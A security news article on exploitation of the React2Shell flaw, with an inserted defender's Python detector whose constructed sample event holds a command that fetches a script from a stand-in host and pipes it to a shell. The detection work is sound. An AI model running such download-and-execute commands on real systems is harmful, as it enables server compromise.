The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has urged federal agencies to apply patches for the React2Shell vulnerability by December 12, 2025, following reports of extensive exploitation.
This critical vulnerability, identified as CVE-2025-55182 (CVSS score: 10.0), impacts the React Server Components (RSC) Flight protocol. The root cause is an unsafe deserialization, enabling an attacker to inject malicious logic for privileged server execution. Other affected frameworks include Next.js, Waku, Vite, React Router, and RedwoodSDK.
Cloudflare’s threat intelligence team, Cloudforce One, stated that “A single, specially crafted HTTP request is sufficient; there is no authentication requirement, user interaction, or elevated permissions involved.” The team added that “Once successful, the attacker can execute arbitrary, privileged JavaScript on the affected server.”
Since its public disclosure on December 3, 2025, this vulnerability has been exploited by numerous threat actors across various campaigns. These attacks involve reconnaissance and the deployment of diverse malware families.
This situation led CISA to include the flaw in its Known Exploited Vulnerabilities catalog last Friday, initially setting a December 26 deadline for federal agencies to apply patches. The deadline was subsequently accelerated to December 12, 2025, highlighting the incident’s critical nature.
Cloud security company Wiz reported observing a “rapid wave of opportunistic exploitation” of the flaw. Most attacks have targeted internet-facing Next.js applications and other containerized workloads within Kubernetes and managed cloud services.
Cloudflare, also monitoring current exploitation activity, indicated that threat actors have used internet-wide scanning and asset discovery platforms to locate exposed systems running React and Next.js applications. Interestingly, some reconnaissance efforts deliberately excluded Chinese IP address spaces.
The web infrastructure company noted that “Their highest-density probing occurred against networks in Taiwan, Xinjiang Uyghur, Vietnam, Japan, and New Zealand – regions frequently associated with geopolitical intelligence collection priorities.”
The activity observed also included more selective targeting of government (.gov) websites, academic research institutions, and critical infrastructure operators. This encompassed a national authority involved in the import and export of uranium, rare metals, and nuclear fuel.
Additional notable findings include:
- Prioritizing high-sensitivity technology targets, such as enterprise password managers and secure vault services, likely to facilitate supply chain attacks.
- Targeting edge-facing SSL VPN appliances whose administrative interfaces may use React-based components.
- Early scanning and exploitation attempts originating from IP addresses previously linked to Asia-affiliated threat clusters.
Kaspersky’s analysis of honeypot data revealed over 35,000 exploitation attempts on December 10, 2025, alone. Attackers initially probed systems with commands like “whoami” before deploying cryptocurrency miners or botnet malware families such as Mirai/Gafgyt variants and RondoDox.
Other identified payloads include Cobalt Strike beacons, Sliver, Fast Reverse Proxy (FRP), the monitoring tool Nezha, a Node.js payload designed to harvest sensitive files and leverage TruffleHog and Gitleaks for secret collection, and a Go-based backdoor offering reverse shell, reconnaissance, and command-and-control (C2) functionalities.
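As an added defender's example that is not from the article or any of the vendors it cites: a small detector run over constructed EDR-style process-creation events (NDJSON; the field names, hosts and the `c2.invalid` URL are assumptions) that flags a `node` process spawning the recon commands, shells and downloaders described above, the post-exploitation pattern a compromised React/Next.js server would show.

```python
import json
import os
import re

# Recon commands the article reports attackers issuing first, plus common peers.
RECON_BINARIES = {"whoami", "id", "uname", "hostname"}
# Shells and download tools a Next.js/RSC server process has no business spawning.
SHELLS = {"sh", "bash", "dash"}
DOWNLOADER_RE = re.compile(r"\b(curl|wget)\b")

# Constructed sample events (not real telemetry). Field names are an assumption.
SAMPLE_EVENTS = """
{"host":"web-01","parent_image":"/usr/bin/node","image":"/usr/bin/node","cmdline":"node server.js"}
{"host":"web-01","parent_image":"/usr/bin/node","image":"/usr/bin/whoami","cmdline":"whoami"}
{"host":"web-02","parent_image":"/usr/bin/node","image":"/bin/sh","cmdline":"sh -c 'curl -s http://c2.invalid/x.sh | sh'"}
{"host":"db-01","parent_image":"/usr/sbin/cron","image":"/bin/sh","cmdline":"sh -c /etc/cron.daily/logrotate"}
{"host":"web-03","parent_image":"/usr/bin/node","image":"/usr/bin/node","cmdline":"node /app/.next/server/worker.js"}
"""


def classify(event):
    """Return an alert label for one process event, or None if it looks benign.

    Only children of a node process are considered: the server itself executing
    whoami, a shell, or a downloader is the signature of the probing and
    payload-staging activity the article describes, not normal app behaviour.
    """
    if os.path.basename(event.get("parent_image", "")) != "node":
        return None
    child = os.path.basename(event.get("image", ""))
    cmdline = event.get("cmdline", "")
    if child in RECON_BINARIES:
        return f"recon: node spawned {child}"
    if child in SHELLS:
        if DOWNLOADER_RE.search(cmdline):
            return f"download: node spawned {child} running a downloader"
        return f"shell: node spawned {child}"
    return None


def detect(raw_ndjson):
    """Parse NDJSON process events and return the alerts raised, in input order."""
    alerts = []
    for line in raw_ndjson.strip().splitlines():
        event = json.loads(line)
        label = classify(event)
        if label:
            alerts.append({"host": event["host"], "alert": label, "cmdline": event["cmdline"]})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

A node process that spawns a child at all is unusual for most Next.js deployments, so a tighter rule may simply alert on any non-node child of node and tune out known build or image tooling.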
Concurrently, React2Shell has reportedly generated over 140 in-the-wild proof-of-concept exploits of varying quality. VulnCheck noted that approximately half of these are broken, misleading, or otherwise non-functional. The functional exploit repositories include logic to load in-memory web shells such as Godzilla, scan for the flaw, and even deploy a lightweight web application firewall (WAF) to counter malicious payloads.
Security researcher Rakesh Krishnan also uncovered an open directory hosted on “154.61.77[.]105:8082.” This directory contained a proof-of-concept (PoC) exploit script for CVE-2025-55182, alongside two other files:
- “domains.txt,” listing 35,423 domains.
- “next_target.txt,” containing 596 URLs, including prominent companies like Dia Browser, Starbucks, Porsche, and Lululemon.
It is believed that the unidentified threat actor is actively scanning the internet, using targets from the second file to infect hundreds of web pages.
Cybersecurity and cyber insurance company Coalition has compared React2Shell to the 2021 Log4Shell vulnerability (CVE-2021-44228), characterizing it as a “systemic cyber risk aggregation event.”
The Shadowserver Foundation’s latest data indicates over 137,200 internet-exposed IP addresses were running vulnerable code as of December 11, 2025. More than 88,900 instances are in the U.S., followed by Germany (10,900), France (5,500), and India (3,600).